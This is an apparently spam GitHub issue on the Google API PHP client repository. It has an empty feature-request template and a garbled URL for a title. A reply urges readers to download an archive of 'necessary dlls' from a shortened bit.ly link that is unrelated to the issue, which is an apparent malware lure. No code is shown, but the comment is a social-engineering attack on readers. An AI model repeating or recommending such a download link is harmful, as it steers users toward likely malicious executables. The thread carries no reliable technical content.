### ISSUE TITLE
https://Microsoft=outlook.com

### ISSUE THREAD

**Issue by ANG377** [googleapis/google-api-php-client#2629]
Thanks for stopping by to let us know something could be better!

**PLEASE READ**: If you have a support contract with Google, please create an issue in the [support console](https://cloud.google.com/support/) instead of filing on GitHub. This will ensure a timely response.

 **Is your feature request related to a problem? Please describe.**

 **Describe the solution you'd like**

 **Describe alternatives you've considered**

 **Additional context**

**Comment by AaryanMadal** [comment]
download

https://bit.ly/4eugCty
I put the necessary dlls in the archive
